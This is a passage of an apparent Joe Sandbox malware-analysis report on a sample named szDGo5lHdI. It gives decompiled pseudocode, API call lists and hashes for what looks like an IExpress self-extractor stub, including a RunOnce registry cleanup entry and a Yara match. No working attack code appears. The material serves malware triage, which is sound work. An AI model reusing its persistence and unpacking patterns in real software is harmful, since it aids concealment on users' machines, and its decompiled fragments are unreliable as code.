0x0040245d
0x00402466
0x00402472
0x00402472
0x0040242f
0x004024af
0x004024b5
0x004024be
0x004024c5
0x00000000
0x004024c5

APIs
• FindFirstFileA.KERNELBASE(?,00408A3A,004011F4,00408A3A,00000000,?,?), ref: 004023F6
• lstrcmpA.KERNEL32(?,004011F8), ref: 00402427
• lstrcmpA.KERNEL32(?,004011FC), ref: 0040243B
• SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00402495
• DeleteFileA.KERNEL32(?), ref: 004024A3
• FindNextFileA.KERNELBASE(00000000,00000010), ref: 004024AF
• FindClose.KERNELBASE(00000000), ref: 004024BE
• RemoveDirectoryA.KERNELBASE(00408A3A), ref: 004024C5
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
• String ID:
• API String ID: 836429354-0
• Opcode ID: 87459b5c72380a807aff589477aa401463d4fc57f92a57124bb70d4d89d3350e
• Instruction ID: 49d887b1e5617c187f2e1a2157473020d0f6751303a448a4b2a9eeaf758e879d
• Opcode Fuzzy Hash: 87459b5c72380a807aff589477aa401463d4fc57f92a57124bb70d4d89d3350e
• Instruction Fuzzy Hash: E6318131604744ABC320DF64CE8DEEB73ACABC4309F14493FB555A62D0EB7C9909875A
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 70%
E00402BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
	void* __ebx;
	void* __edi;
	void* __esi;
	void* __ebp;
	long _t4;
	void* _t6;
	intOrPtr _t7;
	void* _t9;
	struct HINSTANCE__* _t12;
	intOrPtr* _t17;
	signed char _t19;
	intOrPtr* _t21;
	void* _t22;
	void* _t24;
	intOrPtr _t32;

	_t4 = GetVersion();
	if(_t4 >= 0 && _t4 >= 6) {
		_t12 = GetModuleHandleW(L"Kernel32.dll");
		if(_t12 != 0) {
			_t21 = GetProcAddress(_t12, "HeapSetInformation");
			if(_t21 != 0) {
				_t17 = _t21;
				 *0x40a288(0, 1, 0, 0);
				 *_t21();
				_t29 = _t24 - _t24;
				if(_t24 != _t24) {
					_t17 = 4;
					asm("int 0x29");
				}
			}
		}
	}
	_t20 = _a12;
	_t18 = _a4;
	 *0x409124 = 0;
	if(E00402CAA(_a4, _a12, _t29, _t17) != 0) {
		_t9 = E00402F1D(_t18, _t20); // executed
		_t22 = _t9; // executed
		E004052B6(0, _t18, _t21, _t22); // executed
		if(_t22 != 0) {
			_t32 =  *0x408a3a; // 0x0
			if(_t32 == 0) {
				_t19 =  *0x409a2c; // 0x0
				if((_t19 & 0x00000001) != 0) {
					E00401F90(_t19, _t21, _t22);
				}
			}
		}
	}
	_t6 =  *0x408588; // 0x0
	if(_t6 != 0) {
		CloseHandle(_t6);
	}
	_t7 =  *0x409124; // 0x80070002
	return _t7;
}
0x00402c03
0x00402c0d
0x00402c18
0x00402c20
0x00402c2e
0x00402c32
0x00402c36
0x00402c3d
0x00402c43
0x00402c45
0x00402c47
0x00402c49
0x00402c4e
0x00402c4e
0x00402c47
                                                                                                                                                                                                                                    0x00402c32
                                                                                                                                                                                                                                    0x00402c20
                                                                                                                                                                                                                                    0x00402c50
                                                                                                                                                                                                                                    0x00402c54
                                                                                                                                                                                                                                    0x00402c57
                                                                                                                                                                                                                                    0x00402c64
                                                                                                                                                                                                                                    0x00402c66
                                                                                                                                                                                                                                    0x00402c6b
                                                                                                                                                                                                                                    0x00402c6d
                                                                                                                                                                                                                                    0x00402c74
                                                                                                                                                                                                                                    0x00402c76
                                                                                                                                                                                                                                    0x00402c7c
                                                                                                                                                                                                                                    0x00402c7e
                                                                                                                                                                                                                                    0x00402c87
                                                                                                                                                                                                                                    0x00402c89
                                                                                                                                                                                                                                    0x00402c89
                                                                                                                                                                                                                                    0x00402c87
                                                                                                                                                                                                                                    0x00402c7c
                                                                                                                                                                                                                                    0x00402c74
                                                                                                                                                                                                                                    0x00402c8e
                                                                                                                                                                                                                                    0x00402c95
                                                                                                                                                                                                                                    0x00402c98
                                                                                                                                                                                                                                    0x00402c98
                                                                                                                                                                                                                                    0x00402c9e
                                                                                                                                                                                                                                    0x00402ca7

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetVersion.KERNEL32(?,00000002,00000000,?,00406BB0,00400000,00000000,00000002,0000000A), ref: 00402C03
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00406BB0,00400000,00000000,00000002,0000000A), ref: 00402C18
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00402C28
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00406BB0,00400000,00000000,00000002,0000000A), ref: 00402C98
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                                                    • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                                                    • API String ID: 62482547-3460614246
                                                                                                                                                                                                                                    • Opcode ID: 5bf725c2443ac3e33919fba430f8a36c7d83ff64ff9bd08612ecfe4855b0a2a3
                                                                                                                                                                                                                                    • Instruction ID: 373ad44501aeb887ed01a9fdf89c2162dac343eefee69ca1e043016b058be2d5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5bf725c2443ac3e33919fba430f8a36c7d83ff64ff9bd08612ecfe4855b0a2a3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00118C312043166BF7207BA5AF8CA6B37599B88394B04403AB940B72E1DAB8DC418A6D
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 069027EE
                                                                                                                                                                                                                                    • Module32First.KERNEL32(00000000,00000224), ref: 0690280E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.447521600.0000000006902000.00000040.00000020.00020000.00000000.sdmp, Offset: 06902000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6902000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3833638111-0
                                                                                                                                                                                                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                    • Instruction ID: 3381d964e7d3ffb4455239804fc24c6070b45156e20e1d25248d06a357bc3e14
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B3F0F636600311AFE7603BF4AC8CB6E76ECBF88625F200128EA42918C0DB70E9458661
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                                    			E0040202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                                                    				char _v528;
                                                                                                                                                                                                                                    				void* _v532;
                                                                                                                                                                                                                                    				int _v536;
                                                                                                                                                                                                                                    				int _v540;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				signed int _t28;
                                                                                                                                                                                                                                    				long _t36;
                                                                                                                                                                                                                                    				long _t41;
                                                                                                                                                                                                                                    				struct HINSTANCE__* _t46;
                                                                                                                                                                                                                                    				intOrPtr _t49;
                                                                                                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                                                                                                    				CHAR* _t54;
                                                                                                                                                                                                                                    				void _t56;
                                                                                                                                                                                                                                    				signed int _t66;
                                                                                                                                                                                                                                    				intOrPtr* _t72;
                                                                                                                                                                                                                                    				void* _t73;
                                                                                                                                                                                                                                    				void* _t75;
                                                                                                                                                                                                                                    				void* _t80;
                                                                                                                                                                                                                                    				intOrPtr* _t81;
                                                                                                                                                                                                                                    				void* _t86;
                                                                                                                                                                                                                                    				void* _t87;
                                                                                                                                                                                                                                    				void* _t90;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                                                    				signed int _t93;
                                                                                                                                                                                                                                    				void* _t94;
                                                                                                                                                                                                                                    				void* _t95;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t79 = __edx;
                                                                                                                                                                                                                                    				_t28 =  *0x408004; // 0x8f135e3b
                                                                                                                                                                                                                                    				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                                                    				_t84 = 0x104;
                                                                                                                                                                                                                                    				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                    				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                                                    				_t95 = _t94 + 0x18;
                                                                                                                                                                                                                                    				_t66 = 0;
                                                                                                                                                                                                                                    				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                                                    				if(_t36 != 0) {
					L24:
					return E00406CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				while(1) {
					E0040171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
					if(_t41 != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E0040658A( &_v528, _t84, "advpack.dll");
					_t46 = LoadLibraryA( &_v528); // executed
					_t84 = _t46;
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0x409a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0x4091e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0x4091e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x4091e5);
						if(_t90 != 0) {
							 *0x408580 = _t66 ^ 0x00000001;
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
							E0040171E(_t90, _t84, _t54,  &_v268);
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
							RegCloseKey(_v532); // executed
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E004044B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;
					FreeLibrary(_t84); // executed
					if(_t91 == 0) {
						goto L10;
					}
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E0040658A( &_v268, 0x104, 0x401140);
					}
					goto L11;
				}
				_t36 = RegCloseKey(_v532);
				 *0x408530 = _t66;
				goto L23;
			}
                                                                                                                                                                                                                                    0x004021cb
                                                                                                                                                                                                                                    0x004021f1
                                                                                                                                                                                                                                    0x004021f6
                                                                                                                                                                                                                                    0x004021fd
                                                                                                                                                                                                                                    0x004021ff
                                                                                                                                                                                                                                    0x004021ff
                                                                                                                                                                                                                                    0x00402204
                                                                                                                                                                                                                                    0x00402213
                                                                                                                                                                                                                                    0x00402218
                                                                                                                                                                                                                                    0x0040221d
                                                                                                                                                                                                                                    0x0040221d
                                                                                                                                                                                                                                    0x00402220
                                                                                                                                                                                                                                    0x00402220
                                                                                                                                                                                                                                    0x00402222
                                                                                                                                                                                                                                    0x00402223
                                                                                                                                                                                                                                    0x00402229
                                                                                                                                                                                                                                    0x0040223d
                                                                                                                                                                                                                                    0x00402249
                                                                                                                                                                                                                                    0x00402250
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402250
                                                                                                                                                                                                                                    0x004021d2
                                                                                                                                                                                                                                    0x004021d9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004021d9
                                                                                                                                                                                                                                    0x0040213a
                                                                                                                                                                                                                                    0x00402141
                                                                                                                                                                                                                                    0x00402144
                                                                                                                                                                                                                                    0x0040214c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402163
                                                                                                                                                                                                                                    0x00402172
                                                                                                                                                                                                                                    0x00402172
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402163
                                                                                                                                                                                                                                    0x004020ea
                                                                                                                                                                                                                                    0x004020f0
                                                                                                                                                                                                                                    0x00000000

APIs
• memset.MSVCRT ref: 00402050
• memset.MSVCRT ref: 0040205F
• RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0040208C
  • Part of subcall function 0040171E: _vsnprintf.MSVCRT ref: 00401750
• RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004020C9
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004020EA
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00402103
• LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00402122
• GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00402134
• FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00402144
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040215B
• GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0040218C
• LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004021C1
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004021E4
• RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0040223D
• RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00402249
• LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00402250
Strings
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
• String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
• API String ID: 178549006-3765599613
• Opcode ID: 0bf0e1e7ac6b8ceac50cf57e4c09883d7fb06c483310c7f4308435288bc66475
• Instruction ID: abd05bcecfda372187b57d735bcaea41b16cf637c922aa78c443ab609978b97c
• Opcode Fuzzy Hash: 0bf0e1e7ac6b8ceac50cf57e4c09883d7fb06c483310c7f4308435288bc66475
• Instruction Fuzzy Hash: E1510671A00218ABDB209F60DE4DFEB777CEB44700F0041BAFA49F71D1DAB89D498A58
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 232 4055a0-4055d9 call 40468f LocalAlloc 235 4055db-4055f1 call 4044b9 call 406285 232->235 236 4055fd-40560c call 40468f 232->236 251 4055f6-4055f8 235->251 242 405632-405643 lstrcmpA 236->242 243 40560e-405630 call 4044b9 LocalFree 236->243 245 405645 242->245 246 40564b-405659 LocalFree 242->246 243->251 245->246 249 405696-40569c 246->249 250 40565b-40565d 246->250 255 4056a2-4056a8 249->255 256 40589f-4058b5 call 406517 249->256 252 405669 250->252 253 40565f-405667 250->253 254 4058b7-4058c7 call 406ce0 251->254 258 40566b-40567a call 405467 252->258 253->252 253->258 255->256 257 4056ae-4056c1 GetTempPathA 255->257 256->254 261 4056f3-405711 call 401781 257->261 262 4056c3-4056c9 call 405467 257->262 270 405680-405691 call 4044b9 258->270 271 40589b-40589d 258->271 275 405717-405729 GetDriveTypeA 261->275 276 40586c-405890 GetWindowsDirectoryA call 40597d 261->276 269 4056ce-4056d0 262->269 269->271 273 4056d6-4056df call 402630 269->273 270->251 271->254 273->261 288 4056e1-4056ed call 405467 273->288 280 405730-405740 GetFileAttributesA 275->280 281 40572b-40572e 275->281 276->261 289 405896 276->289 282 405742-405745 280->282 283 40577e-40578f call 40597d 280->283 281->280 281->282 286 405747-40574f 282->286 287 40576b 282->287 298 405791-40579e call 402630 283->298 299 4057b2-4057bf call 402630 283->299 291 405771-405779 286->291 292 405751-405753 286->292 287->291 288->261 288->271 289->271 296 405864-405866 291->296 292->291 295 405755-405762 call 406952 292->295 295->287 308 405764-405769 295->308 296->275 296->276 298->287 309 4057a0-4057b0 call 40597d 298->309 306 4057c1-4057cd GetWindowsDirectoryA 299->306 307 4057d3-4057f8 call 40658a GetFileAttributesA 299->307 306->307 314 40580a 307->314 315 4057fa-405808 CreateDirectoryA 307->315 308->283 308->287 309->287 309->299 316 40580d-40580f 314->316 315->316 317 405811-405825 316->317 318 405827-40585c SetFileAttributesA call 401781 call 405467 316->318 317->296 318->271 323 40585e 318->323 323->296
C-Code - Quality: 92%
			E004055A0(void* __eflags) {
				signed int _v8;
				char _v265;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0x408004; // 0x8f135e3b
				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                                                    				_t2 = E0040468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                    				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                                                    				if(_t109 != 0) {
                                                                                                                                                                                                                                    					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                                                    					_t32 = E0040468F(_t82, _t109, 1);
                                                                                                                                                                                                                                    					__eflags = _t32;
                                                                                                                                                                                                                                    					if(_t32 != 0) {
                                                                                                                                                                                                                                    						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                                                    						__eflags = _t33;
                                                                                                                                                                                                                                    						if(_t33 == 0) {
                                                                                                                                                                                                                                    							 *0x409a30 = 1;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						LocalFree(_t109);
                                                                                                                                                                                                                                    						_t35 =  *0x408b3e; // 0x0
                                                                                                                                                                                                                                    						__eflags = _t35;
                                                                                                                                                                                                                                    						if(_t35 == 0) {
                                                                                                                                                                                                                                    							__eflags =  *0x408a24; // 0x0
                                                                                                                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                                                                                                                    								L46:
                                                                                                                                                                                                                                    								_t101 = 0x7d2;
                                                                                                                                                                                                                                    								_t36 = E00406517(_t82, 0x7d2, 0, E00403210, 0, 0);
                                                                                                                                                                                                                                    								asm("sbb eax, eax");
                                                                                                                                                                                                                                    								_t38 =  ~( ~_t36);
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								__eflags =  *0x409a30; // 0x0
                                                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                                                    									goto L46;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									_t109 = 0x4091e4;
                                                                                                                                                                                                                                    									_t40 = GetTempPathA(0x104, 0x4091e4);
                                                                                                                                                                                                                                    									__eflags = _t40;
                                                                                                                                                                                                                                    									if(_t40 == 0) {
                                                                                                                                                                                                                                    										L19:
                                                                                                                                                                                                                                    										_push(_t82);
                                                                                                                                                                                                                                    										E00401781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                                                    										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                                                    										if(_v268 <= 0x5a) {
                                                                                                                                                                                                                                    											do {
                                                                                                                                                                                                                                    												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                                                    												__eflags = _t109 - 6;
                                                                                                                                                                                                                                    												if(_t109 == 6) {
                                                                                                                                                                                                                                    													L22:
                                                                                                                                                                                                                                    													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                    													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                                                    													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                                                    														goto L30;
                                                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                                                    														goto L23;
                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                                    													__eflags = _t109 - 3;
                                                                                                                                                                                                                                    													if(_t109 != 3) {
                                                                                                                                                                                                                                    														L23:
                                                                                                                                                                                                                                    														__eflags = _t109 - 2;
                                                                                                                                                                                                                                    														if(_t109 != 2) {
                                                                                                                                                                                                                                    															L28:
                                                                                                                                                                                                                                    															_t66 = _v268;
                                                                                                                                                                                                                                    															goto L29;
                                                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                                                    															_t66 = _v268;
                                                                                                                                                                                                                                    															__eflags = _t66 - 0x41;
                                                                                                                                                                                                                                    															if(_t66 == 0x41) {
                                                                                                                                                                                                                                    																L29:
                                                                                                                                                                                                                                    																_t60 = _t66 + 1;
                                                                                                                                                                                                                                    																_v268 = _t60;
                                                                                                                                                                                                                                    																goto L42;
                                                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                                                    																__eflags = _t66 - 0x42;
                                                                                                                                                                                                                                    																if(_t66 == 0x42) {
                                                                                                                                                                                                                                    																	goto L29;
                                                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                                                    																	_t68 = E00406952( &_v268);
                                                                                                                                                                                                                                    																	__eflags = _t68;
                                                                                                                                                                                                                                    																	if(_t68 == 0) {
                                                                                                                                                                                                                                    																		goto L28;
                                                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                                                    																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                                                    																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                                                    																			L30:
                                                                                                                                                                                                                                    																			_push(0);
                                                                                                                                                                                                                                    																			_t103 = 3;
                                                                                                                                                                                                                                    																			_t49 = E0040597D( &_v268, _t103, 1);
                                                                                                                                                                                                                                    																			__eflags = _t49;
                                                                                                                                                                                                                                    																			if(_t49 != 0) {
                                                                                                                                                                                                                                    																				L33:
                                                                                                                                                                                                                                    																				_t50 = E00402630(0,  &_v268, 1);
                                                                                                                                                                                                                                    																				__eflags = _t50;
                                                                                                                                                                                                                                    																				if(_t50 != 0) {
                                                                                                                                                                                                                                    																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                    																				}
                                                                                                                                                                                                                                    																				_t88 =  &_v268;
                                                                                                                                                                                                                                    																				E0040658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                                                    																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                    																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                                                    																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                                                    																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                                                    																					__eflags = _t54;
                                                                                                                                                                                                                                    																				} else {
                                                                                                                                                                                                                                    																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                                                    																				}
                                                                                                                                                                                                                                    																				__eflags = _t54;
                                                                                                                                                                                                                                    																				if(_t54 != 0) {
                                                                                                                                                                                                                                    																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                                                    																					_push(_t88);
                                                                                                                                                                                                                                    																					_t109 = 0x4091e4;
                                                                                                                                                                                                                                    																					E00401781(0x4091e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                                                    																					_t101 = 1;
																					_t59 = E00405467(0x4091e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E00402630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E0040597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E00405467(0x4091e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0x4091e4;
											_t70 = E00402630(0, 0x4091e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0x4091e4;
												_t71 = E00405467(0x4091e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E0040597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0x408b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E00405467(0x408b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E004044B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E004044B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0x409124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E004044B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0x409124 = E00406285();
					L2:
					_t38 = 0;
				}
				L47:
				return E00406CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}

Address column of the disassembly listing (the instruction text for these entries was not extracted): 0x004055ab 0x004055b2 0x004055c9 0x004055d5 0x004055d9 0x00405600 0x00405605 0x0040560a 0x0040560c 0x00405638 0x00405641 0x00405643 0x00405645 0x00405645 0x0040564c 0x00405652 0x00405657 0x00405659 0x00405696 0x0040569c 0x0040589f
                                                                                                                                                                                                                                    0x004058a7
                                                                                                                                                                                                                                    0x004058ac
                                                                                                                                                                                                                                    0x004058b3
                                                                                                                                                                                                                                    0x004058b5
                                                                                                                                                                                                                                    0x004056a2
                                                                                                                                                                                                                                    0x004056a2
                                                                                                                                                                                                                                    0x004056a8
